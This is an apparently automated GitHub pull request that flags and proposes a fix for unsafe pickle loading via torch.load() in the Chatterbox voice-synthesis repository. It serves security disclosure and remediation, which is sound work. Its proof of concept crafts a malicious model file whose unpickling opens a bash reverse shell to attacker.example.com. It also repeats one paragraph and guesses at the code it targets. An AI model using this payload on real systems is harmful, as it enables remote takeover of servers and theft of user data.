chatterbox icon indicating copy to clipboard operation
chatterbox copied to clipboard
Published 2 months ago verified publisher icon resemble-ai

[Security] Fix HIGH vulnerability: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch

Open orbisai0security opened this issue 2 months ago • 0 comments

Security Fix

This PR addresses a HIGH severity vulnerability detected by our security scanner.

Security Impact Assessment

Aspect Rating Rationale
Impact Critical In the Chatterbox repository, which appears to be an AI voice synthesis service, exploiting pickle deserialization in the conditional encoder module could allow arbitrary code execution on the server if malicious model files are uploaded or processed, potentially leading to full system compromise, data exfiltration, or disruption of the voice generation service.
Likelihood High Given that Chatterbox is likely a public-facing API or tool for AI-driven voice cloning, attackers motivated by data theft or service disruption could easily craft malicious pickle payloads and submit them via user inputs, as model loading in ML services often processes untrusted data without strict validation.
Ease of Fix Medium Remediation involves refactoring the pickle-based loading in cond_enc.py to use safer methods like PyTorch's state_dict or ONNX, requiring updates to serialization logic, dependency checks, and thorough testing to ensure model compatibility without breaking the voice synthesis functionality.

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability in src/chatterbox/models/t3/modules/cond_enc.py arises from the use of PyTorch's torch.load() function, which relies on pickle for deserialization and can execute arbitrary code when loading a maliciously crafted model file. An attacker could exploit this by replacing or providing a tampered model file (e.g., via a compromised supply chain, file upload, or local access), causing code execution during model loading in Chatterbox's voice synthesis pipeline. This is particularly dangerous in a repository like Chatterbox, which processes user-provided audio data and relies on pre-trained models for inference, allowing remote code execution if the model loading occurs in a server-side context.

The vulnerability in src/chatterbox/models/t3/modules/cond_enc.py arises from the use of PyTorch's torch.load() function, which relies on pickle for deserialization and can execute arbitrary code when loading a maliciously crafted model file. An attacker could exploit this by replacing or providing a tampered model file (e.g., via a compromised supply chain, file upload, or local access), causing code execution during model loading in Chatterbox's voice synthesis pipeline. This is particularly dangerous in a repository like Chatterbox, which processes user-provided audio data and relies on pre-trained models for inference, allowing remote code execution if the model loading occurs in a server-side context.

# PoC: Creating a malicious pickle file that executes arbitrary code on deserialization
# This simulates an attacker crafting a payload that could be disguised as a legitimate PyTorch model file
# (e.g., a .pth file) and replacing or uploading it to exploit the torch.load() call in cond_enc.py

import pickle
import torch
import os

# Define a malicious class that executes code when unpickled
class MaliciousPayload:
    def __reduce__(self):
        # This will execute arbitrary commands when the object is unpickled
        # Example: Reverse shell to attacker-controlled server
        import subprocess
        return (subprocess.Popen, (['/bin/bash', '-c', 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'],))

# Create a fake PyTorch model state dict with the malicious payload embedded
# In a real exploit, this would mimic the structure of a Chatterbox model (e.g., conditional encoder weights)
fake_model = {
    'model_state_dict': torch.randn(10, 10),  # Dummy tensor to mimic a real model
    'malicious': MaliciousPayload()  # Embedded malicious object
}

# Serialize to a pickle file (mimicking torch.save behavior)
with open('malicious_model.pth', 'wb') as f:
    pickle.dump(fake_model, f)

print("Malicious model file created: malicious_model.pth")

# PoC: Simulating the vulnerable loading in Chatterbox's cond_enc.py context
# This code mimics how the repository might load the model, triggering the exploit
# Assume the vulnerable code in cond_enc.py does something like: model.load_state_dict(torch.load('path/to/model.pth'))

import torch
import pickle  # PyTorch's torch.load uses pickle internally

# In the repository, this would be called during model initialization or inference
# E.g., in a function like load_conditional_encoder() in cond_enc.py
def load_model_from_file(file_path):
    # Vulnerable: torch.load() deserializes pickle without safety checks
    loaded_data = torch.load(file_path)  # This executes the malicious payload
    # In Chatterbox, this might load into a ConditionalEncoder class
    return loaded_data

# Attacker places 'malicious_model.pth' in the expected path (e.g., via file upload or supply chain compromise)
# Then, when Chatterbox runs inference (e.g., processing user audio for voice cloning), it loads the model
try:
    model_data = load_model_from_file('malicious_model.pth')
    print("Model loaded successfully (but malicious code executed in the background)")
except Exception as e:
    print(f"Error: {e}")  # In practice, the exploit runs before any error handling

Exploitation Impact Assessment

Impact Category Severity Description
Data Exposure High Successful exploitation could access and exfiltrate sensitive user data processed by Chatterbox, such as uploaded audio files for voice cloning, personal voice profiles, or API keys used for Resemble AI services. If Chatterbox handles user authentication or stores session data, credentials could be stolen, leading to broader account compromise across the platform.
System Compromise High Arbitrary code execution allows full control over the server running Chatterbox, potentially escalating to root access via system binaries or kernel exploits. In a typical deployment (e.g., Docker containers or cloud VMs), this could enable lateral movement to other services, data exfiltration, or persistence through backdoors.
Operational Impact High Exploitation could cause service disruption by corrupting or deleting model files, leading to inference failures in voice synthesis tasks. If chained with a denial-of-service payload, it could exhaust resources (e.g., CPU/GPU for model loading), rendering Chatterbox unavailable for users and requiring model re-training or restoration from backups.
Compliance Risk High Violates OWASP Top 10 A8 (Insecure Deserialization) and could breach GDPR if user audio data (potentially PII) is exfiltrated. For AI/ML systems, it fails NIST AI RMF guidelines on secure model handling and may impact SOC2 compliance for data integrity in voice AI services.

Vulnerability Details

  • Rule ID: trailofbits.python.pickles-in-pytorch.pickles-in-pytorch
  • File: src/chatterbox/models/t3/modules/cond_enc.py
  • Description: Functions reliant on pickle can result in arbitrary code execution. Consider loading from state_dict, using fickling, or switching to a safer serialization method like ONNX

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

  • src/chatterbox/models/t3/modules/cond_enc.py

Verification

This fix has been automatically verified through:

  • ✅ Build verification
  • ✅ Scanner re-scan
  • ✅ LLM code review

🤖 This PR was automatically generated.

orbisai0security avatar Dec 28 '25 10:12 orbisai0security